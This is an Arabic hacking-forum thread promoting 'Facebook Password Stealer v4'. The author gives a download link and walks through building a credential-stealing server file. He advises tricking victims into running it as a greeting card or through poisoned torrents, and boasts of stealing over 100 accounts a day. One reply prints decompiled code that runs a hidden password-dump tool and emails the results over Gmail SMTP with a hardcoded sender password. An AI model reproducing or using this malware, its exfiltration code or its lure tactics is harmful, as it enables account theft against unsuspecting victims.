http://forum.fathinet.com/_test/bismi_allah.gif




تنبيه هام (X*)
===========

البرنامج خطير جدا ومتشفر بخوارزمية قاتلة وغير مكشوف من اي انتي فيرس ومتلغم جاهز.

متحاولش تفتح البرنامج في جهازك لانه في لحظة الباسوردات ال محتفظ بيها هتبقي في الشارع وكل اللي رايح واللي جاي يشوت فيها ^__^






نبدأ الشرح علي بركة الله
====================

ازاي تسرق باسوردات الفيس بوك من جهاز الضحية باستخدام برنامج

Facebook Password Stealer


دي تعتبر من الطرق القليلة والمضمونة لسرقة الباسوردات

الاصدارة الرابعة من البرنامج .. فيها تغييرات وامكانيات اكبر من الاصدارت السابقة.

اولا: حمل البرنامج من الرابط الاتي

https://github.com/v1rus0bl4ck/files/releases/download/files/fbsR4.exe

هتلاقي ملف اسمه
fbsR4.exe
علي هيئة عقرب ^_^

http://p.im9.eu/fbsr4.jpg

ده الملف اللي هتصنع بيه السيرفر الخاص بيك

هتفتح الملف ده هتلاقي الايميل بتاعي مكتوب كده
[email protected]
هتمسحه وتقوم كاتب الايميل بتاعك انت .. واتاكد انك كاتب الايميل صح عشان اي غلطة في الايميل معناها ان الباسوردات مش هتوصلك.

بعدين تدوس create server هتلاقي ملف جديد ظهر اسمه
server.exe

ده بقا الملف الخطير .. اللي بيسرق الباسوردات المخزنة في جهاز الضحية ويبعتهملك علي الايميل اللي كتبته..وده هو الملف اللي متحاولش تفتحه في جهازك


هترسل السيرفر ده للضحية علي انه مثلا كارت معايدة ^__^
او اي حاجة تقنعه انه يفتح الملف في جهازه

ولو عايز ضحايا كتير ممكن تلغم السيرفر ده في ملف تورنت.. وترفعة علي مواقع التورنت
انا استخدمت الطريقة دي .. واقدر اقولك انه بيوصلني كل يوم اكتر من 100 ايميل فيسبوك
وكل يوم العدد بيزيد ^_^

طبعا في طرق كتير غير دي واجمل منها..وكل هكر وله طريقته الخاصة في جلب الضحايا

بعد ما الضحية يفتح البرنامج
البرنامج هيسرق باسوردات الفيس بوك المسجلة علي جهازه ويبعتهم للايميل بتاعك

تروح تفتح الايميل بتاعك .. هتلاقي الباسوردات بالشكل ده

http://p.im9.eu/5152.jpg


مبروك عليك الباسوردات ^_^




مميزات البرنامج
============

بيقدر يسحب الباسوردات من:

Firefox
Internet Explorer
Google Chrome
Chrome Canary/SXS
CoolNovo Browser
Opera Browser
Apple Safari
Flock Browser
SeaMonkey Browser
Comodo Dragon Browser
SRWare Iron Browser
Paltalk Messenger
Miranda Messenger


كمان التبليغ اصبح عن طريق الايميل .. يعني مفيش وجع القلب بتاع المواقع وكل شوية الصفحة تقفل من كتر الضغط .

كمان البرنامج سهل جدا في الاستخدام وواجهته بسيطة..بس امكانياته رهيبه ^_^


عيوب البرنامج
============

للاسف البرنامج مكتوب بالسي شارب
يعني هيحتاج net-frameworkv4.5
عموما دي مشكلة صغيرة..لان معظم الاجهزة دلوقتي فيها ال net-frameworkv4.5 اللهم الا القليل
وان شاء الله هحاول اعيد كتابة البرنامج بالسي بلس بلس
بس دا هياخد وقت ومجهود


ملحوظة مهمة (*)
===========


للناس اللي مش مصدقة.. وكانت تستهزئ بالموضوع.. حمل البرنامج وشغله علي ويندوز وهمي..ولو خايف علي الايميل الاساسي بتاعك.. اعمل ايميل جديد واستخدمه.. وشوف بنفسك البرنامج شغال او لا . ^__^

والناس اللي اتهمتني زور .. بالعقل يعني في واحد عايز يخترق جهازك يقولك البرنامج خطير ومتلغم ومتشفر ومتفتحوش في جهازك .. لا وايه كمان يحطه في منتدي هكرز .. يعني المنطق بيقول لو عايز اعمل كده اروح منتدي زي "سيدتي" او منتدي "شباب كول" ^__^

كمان ياريت الاعضاء اللي جربو البرنامج واشتغل معاهم يدخلوا ويقولوا رايهم بصراحة حتي لو في نقد او ملحوظه حابب يضيفها اكيد هرحب بيه

وفي الختام احب اتقدم بالشكر لكل الاعضاء اللي ساهموا بارائهم وافكارهم في تطوير البرنامج ووصوله لشكله الحالي
تحياتي للجميع

V!RU$ BL4CK

انا اشكرا المشرف العام

انا اشكرا المشرف العام

شكرا لمرور يا غالي

تحياتي لك

تم التحديث .. بالتوفيق

جاري الفحص مشكووووووووررر

شكرا علي مرورك اخي الكريم

جاري التجربة أخي و مشكور على المجهودات جبارة حقا في سبيل الافادة و المساعدة
تستحق التقييم

- - - تم التحديث - - -

مع كل احتراماتي لك بس البرنامج طــــــلع فيروس
كشفو
avast antivirus
و اتمنى اني لم احرج اخي

وعليكم السلام..
شاكر لك جهدك اخي الكريم لاكن هناك بعض الملاحظات
اولا الادة نظيفة لاكن بعد تشغيل انشاء السيرفر و تشغيله
ينزل ملفين في جهازي الضحية في المسار ----> C:\Users\ANAS\AppData\Roaming
(ANAS)---> اسم المستخدم :redface:
بأسم
res.com
fbsm.exe

حقيقتا لم اعرف عمل الملف res.com
لكن عمل fbsm.exe هو ارسال بيانات الضحية الى الملغم
هذا الكود بعد استخراجه



Private Shared Sub Run(ByVal email As String)
Try
Dim folderPath As String = Environment.GetFolderPath(SpecialFolder.Applicatio nData)
Console.WriteLine(folderPath)
Dim res As Byte() = Resources.res
File.WriteAllBytes((folderPath & "\res.com"), res)
Dim str2 As String = ""
Dim str3 As String = (folderPath & "\res.com")
Dim process As New Process With { _
.StartInfo = { UseShellExecute:=False, CreateNoWindow:=True, WindowStyle:=ProcessWindowStyle.Hidden, RedirectStandardOutput:=True, RedirectStandardError:=True, FileName:="cmd", Arguments:=("/c " & str3) } _
}
process.Start
Do While Not process.StandardOutput.EndOfStream
str2 = (str2 & process.StandardOutput.ReadToEnd)
Loop
str2 = str2.Replace("************************************************** **************", "").Replace("Facebook Password Dump v3.0 by SecurityXploded", "").Replace("http://securityxploded.com/facebook-password-dump.php", ("********** Machine Name: " & Environment.MachineName & " **********")).Replace("Tip: For more options type FacebookPasswordDump.exe -h", "")
Console.WriteLine(str2)
Dim message As New MailMessage With { _
.From = New MailAddress("[email protected]") _
}
message.To.Add(email)
message.Subject = "****** V!RU$ BL4CK v4 ******"
message.Body = str2
New SmtpClient("smtp.gmail.com", &H24B) With { _
.Credentials = New NetworkCredential("[email protected]", "otyoeiretjkpwxls"), _
.EnableSsl = True _
}.Send(message)
Console.WriteLine("sent")
Catch exception As Exception
Console.WriteLine(exception.Message)
End Try
End Sub


على ما يبدو لي ان البيانات لا تذهب فقط الى الملغم بل تذهب ايضاً الى صاحب البرنامج
وهذا امر غير جيد يعتبر اسغلال !
جربت الادة على ايميل وهمي ارسلت الادة الرساله لاكن بدون بيانات الفيسبوك
و السبب تصدى الوحش كروم له
http://www12.0zz0.com/2015/04/23/23/179371553.png

و هذي التبليغ وصل لدى بدون بيانات

http://www12.0zz0.com/2015/04/23/23/850464772.png

جاري التجربة أخي و مشكور على المجهودات جبارة حقا في سبيل الافادة و المساعدة
تستحق التقييم

- - - تم التحديث - - -

مع كل احتراماتي لك بس البرنامج طــــــلع فيروس
كشفو
avast antivirus
و اتمنى اني لم احرج اخي


اولا البرنامج مش فيرس ده برنامج اختراق بترسله للضحية يسحبلك باسوردات الفيسبوك من جهازه ويبعتهم للايميل بتاعك يعني انت مبتفتحهوش علي جهازك

ثانيا انا حملت افاست وعملت ابديت وفحصت البرنامج والبرنامج طالع نظيف ممكن اخوي تفحصه تاني او تبعتلي ايه القيم اللي مسكها افاست عشان اغير كود البرنامج او نغير طريقة التشفير

ومشكور اخوي علي المرور


- - - تم التحديث - - -


على ما يبدو لي ان البيانات لا تذهب فقط الى الملغم بل تذهب ايضاً الى صاحب البرنامج
وهذا امر غير جيد يعتبر اسغلال !


لو ركزت كويس في الكود هتلاقي ان البرنامج بيستخدم امر send مرة واحده فقط وده دليل ان البرنامج مش بيرسل البيانات غير مرة واحده بس لايميل الملغم

الاداه بتستخدم ايميل خاص لارسال البيانات .. مش بترسل البيانات عن طريق عفريت مثلا :biggrin: عشان كده انت اتلخبط وقريت الكود غلط وافتكرت ان الاداة بترسل البيانات لاكثر من شخص

الاداة مش مفتوحة المصدر وانا صاحب الاداة ولي كافة الحقوق محفوظه يعني مفيش حاجة اسمها استغلال



جربت الادة على ايميل وهمي ارسلت الادة الرساله لاكن بدون بيانات الفيسبوك
و السبب تصدى الوحش كروم له

الاداة تقوم بفك قاعدة بيانات المتصفحات..والنسخة الاخيرة من قوقل كروم فقس الاداة ونزل حماية شديدة علي قاعدة بياناته وجاري محاولة فكها وانشاء الله سنقوم بعمل النسخة الخامسة للبرنامج وتكون قادرة علي جلب الباسوردات من جوجل كروم

وانا بشكرك علي التبليغ ولو عندك اقتراح تحب تضيفه ياريت تبعتهولي علي الخاص

تحياتي لك

ترقبوا الاصدار الجديد قريبا

شغال حاليا ؟!

http://www9.0zz0.com/2015/06/03/00/677352189.jpg


ملغم

- - - تم التحديث - - -

http://www9.0zz0.com/2015/06/03/00/147176366.jpg

انا مش عامل ابديت للافيرا حتى وكشفه :)
شكرا ع المجهود
http://imgchili.net/show/66122/66122438_ashampoo_snap_2015.0.png

انا مش عامل ابديت للافيرا حتى وكشفه :)
شكرا ع المجهود
http://imgchili.net/show/66122/66122438_ashampoo_snap_2015.0.png

اخوي الاصدار قديم واصبح مكشوف من الانتي فيرس

ان شاء الله انتظروا الاصدار الجديد

تحياتي

مشكوووووووووووووووووووووو ووووووووووووووووووووووووو ووووووووووووووووووووووووو ووووووووووووووووووووووووو وووور وما قصرت أنت أول واحد أستفيد منه بالمنتدى